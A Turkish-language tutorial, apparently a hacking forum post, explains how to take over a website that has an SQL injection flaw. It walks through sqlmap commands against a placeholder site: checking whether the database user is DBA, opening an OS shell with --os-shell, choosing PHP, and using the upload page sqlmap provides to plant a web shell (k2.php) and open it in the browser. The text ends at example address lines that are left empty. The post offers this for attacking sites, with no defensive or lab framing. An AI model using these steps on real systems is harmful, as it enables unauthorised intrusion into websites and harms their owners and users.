İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.
Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;
Normalde bu kodu kullanıyorduk;
sqlmap -u "
www.sqlaciklisite.com/php?id=" --dbs
Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;
Kullanacağımız Kodumuz:
sqlmap -u "
www.sqlaciklisite.com/php?id=" --current-user --is-dba
komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;
Kodumuz:
--> current user is DBA : True <--
Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;
Kodumuz:
sqlmap -u "
www.sqlaciklisite.com/php?id=" --os-shell
Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.;
Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;
(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)
|1|ASP
|2|PHP
|3|ASPX
|4|JSP
Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz "php" diliyle yazılmış çünkü.
Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.
İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.
Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp
enter tuşuna basmamız yeterlidir Örnek olarak;
Sitemizin adresi:
Buraya upload ediyoruz mesela, shellimizin adı k2.php olsun
Sitemizin adresi:
